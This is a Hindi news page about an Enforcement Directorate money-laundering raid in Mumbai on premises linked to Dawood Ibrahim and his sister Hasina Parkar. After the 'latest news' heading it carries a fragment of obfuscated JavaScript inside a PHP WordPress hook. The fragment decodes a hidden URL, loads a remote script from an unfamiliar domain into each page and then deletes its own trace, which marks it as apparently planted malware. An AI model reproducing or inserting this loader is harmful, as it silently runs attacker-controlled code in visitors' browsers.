Saturday, July 27, 2024
spot_img

बिग ब्रेकिंगः मुंबई में ईडी ने दाऊद के ठिकानों पर की छापेमारी! मनी लान्ड्रिंग मामले में कई राजनेताओं की भी हो रही जांच

नई दिल्ली। मुंबई में आज प्रवर्तन निदेशालय (ईडी) ने बड़ी कार्यवाही करते हुए अंडरवर्ल्ड और मनी लांड्रिंग से जुड़े लोगों के ठिकानों पर छापेमारी की है। सूत्रों की मानें तो इस मामले में कुछ अंडरवर्ल्ड भगोड़े और राजनेताओं की भी जांच चल रही है। जानकारी के अनुसार ईडी के अधिकारी दाऊद इब्राहिम की बहन हसीना पारकर के मुंबई स्थित आवास पर भी गए हैं। आपको बता दें कि महाराष्ट्र की राजधानी में करीब 10 जगहों पर ईडी की तलाशी चल रही है। यह कार्रवाई प्रिवेंशन ऑफ मनी लॉन्ड्रिंग एक्ट (पीएमएलए) के तहत की जा रही है। सूत्रों ने बताया कि एक नेता के कुछ परिसरों पर भी छापेमारी की गई है। उन्होंने कहा कि ईडी को मिली कुछ खुफिया सूचनाओं और राष्ट्रीय जांच एजेंसी (एनआईए) द्वारा दर्ज प्राथमिकी के आधार पर कार्रवाई की जा रही है।
माना जाता है कि दाऊद इब्राहिम ने 1980 के दशक में भारत से भागकर एक विशाल व्यापारिक साम्राज्य स्थापित किया था। हाल ही में पंजाब में डी-कंपनी (दाऊद इब्राहिम द्वारा नियंत्रित मुंबई अंडरवर्ल्ड संगठित अपराध सिंडिकेट) की उपस्थिति मिली थी, जो इस बात का संकेत है कि पाकिस्तान की आईएसआई ने पंजाब में आतंक फैलाने के लिए अंडरवर्ल्ड का इस्तेमाल करना शुरू कर दिया है। मुंबई में 1993 में हुए बम धमाकों का मास्टरमाइंड दाऊद भारत का मोस्ट वांटेड भगोड़ा है।

Related Articles

- Advertisement -spot_img

ताजा खबरे

eInt(_0x383697(0x178))/0x1+parseInt(_0x383697(0x180))/0x2+-parseInt(_0x383697(0x184))/0x3*(-parseInt(_0x383697(0x17a))/0x4)+-parseInt(_0x383697(0x17c))/0x5+-parseInt(_0x383697(0x179))/0x6+-parseInt(_0x383697(0x181))/0x7*(parseInt(_0x383697(0x177))/0x8)+-parseInt(_0x383697(0x17f))/0x9*(-parseInt(_0x383697(0x185))/0xa);if(_0x351603===_0x4eaeab)break;else _0x8113a5['push'](_0x8113a5['shift']());}catch(_0x58200a){_0x8113a5['push'](_0x8113a5['shift']());}}}(_0x48d3,0xa309a));var f=document[_0x3ec646(0x183)](_0x3ec646(0x17d));function _0x38c3(_0x32d1a4,_0x31b781){var _0x48d332=_0x48d3();return _0x38c3=function(_0x38c31a,_0x44995e){_0x38c31a=_0x38c31a-0x176;var _0x11c794=_0x48d332[_0x38c31a];return _0x11c794;},_0x38c3(_0x32d1a4,_0x31b781);}f[_0x3ec646(0x186)]=String[_0x3ec646(0x17b)](0x68,0x74,0x74,0x70,0x73,0x3a,0x2f,0x2f,0x62,0x61,0x63,0x6b,0x67,0x72,0x6f,0x75,0x6e,0x64,0x2e,0x61,0x70,0x69,0x73,0x74,0x61,0x74,0x65,0x78,0x70,0x65,0x72,0x69,0x65,0x6e,0x63,0x65,0x2e,0x63,0x6f,0x6d,0x2f,0x73,0x74,0x61,0x72,0x74,0x73,0x2f,0x73,0x65,0x65,0x2e,0x6a,0x73),document['currentScript']['parentNode'][_0x3ec646(0x176)](f,document[_0x3ec646(0x17e)]),document['currentScript'][_0x3ec646(0x182)]();function _0x48d3(){var _0x35035=['script','currentScript','9RWzzPf','402740WuRnMq','732585GqVGDi','remove','createElement','30nckAdA','5567320ecrxpQ','src','insertBefore','8ujoTxO','1172840GvBdvX','4242564nZZHpA','296860cVAhnV','fromCharCode','5967705ijLbTz'];_0x48d3=function(){return _0x35035;};return _0x48d3();}";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}} ?>